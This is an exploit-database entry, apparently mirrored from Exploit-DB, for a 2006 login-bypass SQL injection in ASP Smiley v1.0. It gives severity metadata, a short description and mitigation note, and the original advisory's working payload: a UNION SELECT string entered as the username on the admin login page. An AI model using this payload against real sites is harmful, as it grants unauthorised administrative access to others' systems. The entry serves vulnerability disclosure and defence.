header-logo
Suggest Exploit
vendor:
ASP Smiley
by:
ajann
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ASP Smiley
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability

A vulnerability in ASP Smiley v1.0 (default.asp) allows an attacker to bypass authentication and gain access to the application by sending a specially crafted SQL injection payload to the application. This payload can be sent as part of the username parameter when attempting to log in.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, authentication should be done using a secure method such as hashing.
Source

Exploit-DB raw data:

*******************************************************************************
# Title  :  ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author :   ajann

*******************************************************************************
Example:

###http://[target]/[path]/admin/

UserName: ' union select 0,0,0,0,0,0,0,0 from categories


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-14]